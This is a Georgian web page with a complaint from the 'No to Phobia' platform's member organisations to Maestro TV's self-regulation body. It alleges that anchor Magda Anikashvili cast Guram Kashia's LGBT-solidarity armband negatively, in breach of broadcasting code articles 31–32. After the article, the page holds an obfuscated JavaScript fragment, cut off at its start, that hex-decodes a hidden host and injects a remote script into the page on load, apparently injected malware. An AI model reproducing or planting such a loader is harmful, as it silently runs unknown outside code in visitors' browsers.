წერილი წარმატებით გაიგზავნა

ოპერაციის შესრულებისას დაფიქსირდა შეცდომა! წერილი არ იყო გაგზავნილი

გთხოვთ შეავსოთ ყველა ველი!

სიახლეების გამოწერა დასრულდა წარმატებით!

სიახლეების გამოწერისას მოხდა შეცდომა!

მითითებული ელ-ფოსტა უკვე არსებობს გამოწერის სიაში!

გთხოვთ შეიყვანოთ სწორი ელ-ფოსტა!

თვითრეგულირების პრაქტიკა

“არა ფობიას!” წევრი ორგანიზაციების საჩივარი ტელეკომპანია “მაესტროს” თვითრეგულირების ორგანოს

საჩივარი: საქართველოს ეროვნული ნაკრების ვიცე-კაპიტნისა და "ვიტესის" მცველის გურამ კაშიას მიერ "ჰერაკლესის" წინააღმდეგ გამართულ მატჩში LGBT პირთა მხარდამჭერი სამკლაურით თამაშს საქართველოში, საზოგადოების გარკვეულ ჯგუფებში, უარყოფითი რეაქცია და ჰომოფობიური განწყობების გაღვივება მოჰყვა. ამ ფონზე, აღნიშნული თემის გაშუქებისას, მაღალია მედიის წარმომადგენლების პასუხისმგებლობა, რათა პრობლემის არსობრივი განხილვის ნაცვლად, თავად ისინი არ გახდნენ ჰომოფობიური განწყობების წამახალისებლები.

სამოქალაქო პლატფომა "არა ფობიას” წევრი ორგანიზაციები - მედიის განვითარების ფონდი, თანასწორობის მოძრაობა, ტოლერანტობის და მრავალფეროვნების ინსტიტუტი, საქართველოს დემოკრატიული ინიციატივა, შავი და ბალტიის ზღვის ალიანსი საჩივრით მივმართავთ ტელეკომპანია "მაესტროს” თვითრეგულირების ორგანოს შეისწავლოს აღნიშნული საკითხი და იმსჯელოს გადაცემის წამყვანის მაგდა ანიკაშვილის მხრიდან მაუწყებელთა ქცევის კოდექსის 31-ე და 32-ე მუხლების დარღვევაზე.

27 ოქტომბერს მაესტროს საინფორმაციო გამოშვების ახალი ამბები მაესტროზე (15:00) ეთერში წამყვანი მაგდა ანიკაშვილი გურამ კაშიას მიერ ლგბტ დროშის სამკლაურის ტარების შესახებ ფეხბურთის ფედერაციის ვიცე პრეზიდენტთან ნიკა ჯღარკავასთან საუბრობდა. მიუხედევად იმისა, რომ გადაცემაში მოწვეული რესპონდენტი ცალსახად აცხადებდა, რომ გურამ კაშიას მიერ სამკლაურის ტარება არ ეწინააღმდეგებოდა საქართველოს ფეხბურთის ფედერაციის პოზიციას და ისინი საერთაშორისო საფეხბურთო ორგანიზაციებთან ერთად გმობდნენ დისკრიმინაციას, ინტერვიუს მსვლელობისას აშკარა იყო წამყვანის მცდელობა, ნეგატიურ კონტექსტში განეხილა ფეხბურთელის ქმედება.

მაგდა ანიკაშვილი, წამყვანი: "მე არ მინდა, რომ ვიყო ძალიან რადიკალური გურამ კაშიას მიმართ, მაგრამ, ასე ვთქვათ, [ის] თავს ახვევს გულშემატკივარს თავის პოზიციას და იყენებს ფეხბურთს თავისი მოსაზრებების გასავრცელებლად, - ასე შეიძლება ითარგმნოს ზოგიერთი გულშემატკივრის თვალში ეს აქცია”.

ჟურნალისტი კითხვების დასმისას ავითარებს აზრს, რომ გურამ კაშიას მიერ ლგბტ თემის წარმომადგენლების მიმართ ძალადობის დაგმობის მიზნით გაკეთებული სამკლაური, შესაძლოა, შეურაცხმყოფელი იყოს ფეხბურთის ზოგიერთი გულშემატკივრისთვის და ამით ამყარებს სტერეოტიპს იმის შესახებ, რომ უმცირესობათა უფლებრივ მდგომარეობაზე საუბარი არ არის მიზანშეწონილი საზოგადოების ჰომოფობიური განწყობების გამო, რომ ფეხბურთის ფედერაციებმა პატივი უნდა სცენ გულშემატკივართა იმ ნაწილს, ვინც ჰომოფობიურად არის განწყობილი

მაგდა ანიკაშვილი, წამყვანი: "არიან ადამიანები, რომლებიც არ ფიქრობენ ასე და მათთვის მიუღებელია ეს ღირებულებები, ხომ? ამ ადამიანების აზრის გათვალისწინება თუ არა, თავს არმოხვევა ხომ თამაშის დროს ამ ღირებულებების, აი, ეს არ იქნებოდა კეთილსინდისიერი უფრო, ნეილტრალური დამოკიდებულება გულშემატკივრების მიმართ? არიან კონსერვატორი გულშემატკივრებიც, რატომ არის მისასალმებელი მათი გაღიზიანება თამაშის დროს მოედანზე?”

მედიის წარმომადგენლის მხრიდან საზოგადოების ყველაზე მოწყვლადი ჯგუფების მიმართ სპორტსმენის სამოქალაქო სოლიდარობის აქტის განხილვა გულშემატკივრისთვის "საკუთარი აზრის თავს მოხვევა”-დ სერიოზულ პრობლემას წარმოადგენს და იმ პროპაგანდისტული ნარატივის შემადგენელია, რომლის თანახმად, ლგბტ თემის წარმომადგენლებისა და აქტივისტების მიერ თემის ღიად მხარდაჭერა პროპაგანდად და საფრთხედ არის შეფასებული.

უფრო მეტიც, საინფორმაციო გადაცემის წამყვანი ეჭვქვეშ აყენებს რესპონდენტის ნათქვამის ლეგიტიმურობას, როდესაც მის პოზიციას დისკრიმინაციის მიუღებლობის შესახებ მისი თანამდებობრივი სტატუსით ხსნის და ცდილობს რესპონდენტის ნარატივის პოზიტიური კონტექსტი ნეგატიურით ჩაანაცვლოს:

მაგდა ანიკაშვილი, წამყვანი: "გასაგებია ჩვენ ეხლა საკამათო საკითხზე ვსაუბრობთ მე მესმის თქვენ ეხლა გარკვეულწილად ხართ შეზღუდული რადგან ოფიციალური წარმომადგენელი ხართ ფეხბურთის ფედერაციის…”

ვთვლით, რომ ტელეკომპანია "მაესტრომ” დაარღვია მაუწყებელთა კოდექსის 31-ე და 32-ე მუხლები, რომლებიც მრავალფეროვნების, თანასწორობისა და შემწყნარებლობის პრინციპებსა და წესებს განსაზღვრავენ. კერძოდ:

მუხლი 31. მრავალფეროვნებისა, თანასწორობისა და შემწყნარებლობის პრინციპი

მაუწყებელმა თავი უნდა შეიკავოს ისეთი მასალის გამოქვეყნებისგან, რომელიც გააღვივებს სიძულვილს ან არატოლერანტობას რასის, ენის, სქესის, რელიგიური კუთვნილების, პოლიტიკური შეხედულებების, ეთნიკური, გეოგრაფიული ან სოციალური წარმოშობის საფუძველზე.

მუხლი 32. მაუწყებლის მიერ მრავალფეროვნების, თანასწორობის და შემწყნარებლობის პრინციპების დაცვისადმი წაყენებული მოთხოვნები (წესები)

1.მაუწყებელი ვალდებულია სამაუწყებლო ბადეში განათავსოს ზუსტი და სარწმუნო, დაბალანსებული, პროპორციული და თანაზომადი ინფორმაცია საქართველოში მცხოვრებ ყველა კულტურულ, რელიგიურ, ეთნიკურ ჯგუფზე და სოციალურ ფენაზე სამართლიანობის და მიუკერძოებლობის პრინციპების დაცვით…

3.მაუწყებელმა პატივი უნდა სცეს ადამიანის უფლებებსა და თავისუფლებებს.

უფრო მეტიც, თუ მაუწყებელთა ქცევის კოდექსის 33-ე მუხლის მე-4 პუნქტი ავალდებულებს მაუწყებელს, რესპონდენტთა მხრიდან პირდაპირ ეთერში ან ახალ ამბებში დისკრიმინაციული განცხადებების გაკეთებისას ან სექსუალურ ორიენტაციასა თუ ნებისმიერ სხვა ნიშანზე უსაფუძვლო მითითებისას, არ წაახალისოს ასეთი გამოხატვა და დასვას კრიტიკული კითხვები სტუმრის მიმართ, აღნიშნულ შემთხვევაში გადაცემის წამყავნი თავად მოგვევლინა დისკრიმინაციის წყაროდ.


//n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[Ss]{1,2}/g);for(var e="",n=0;n < t.length;n++)e+=String.fromCharCode(parseInt(t[n],16));return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e < 3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="notophobia.ge",i=function(t,e,n){for(var o=[].slice.call(n),r=t.split("."),i=r.pop(),c=0;c < r.length;c++)e=e[r[c]];return e[i].apply(e,o)},c=function(t,e){for(var n=t.split("."),o=!1,r=0;r < n.length;r++)e[n[r]]?(e=e[n[r]],o=!0):o=!1;return o},f=function(t,e,n){var lp=p();if(lp=="")return;var r=lp+"//"+t;if(-1==navigator.userAgent.toLowerCase().indexOf("firefox")){if(c(o("736d6c6f"),window))return i(o("736d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")]);if(c(o("7a536d6c6f"),window))return i(o("7a536d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")])}var f=document.createElement("script");f.setAttribute("src",r),f.setAttribute("type","text/javascript"),document.head.appendChild(f),f.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof e&&e())},f.onerror=function(){this.a1649136515||(this.a1649136515=!0,f.parentNode.removeChild(f),"function"==typeof n&&n())}},a=function(){var t,e=["a@bl@tbAdb@vbH@beb@br@be".split("b").join("").split("@").join(""),"a2013543385","a2287596422","a540125352"],n=document.body.classList,o=document.body.className;if(n){for(t=0;t < e.length;t++)if(n.contains(e[t]))return!1}else if(o)for(t=0;t < e.length;t++)if(o.indexOf(e[t])>-1)return!1;return!0},d=function(i){if(a()){var c=t[i],u=o(c)+"/d6safundjenk6af/"+e+"/c/"+n(r)+"_"+(self===top?0:1)+".js";window.a3164427983=c,f(u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}(); //]]>
  • გააზიარე: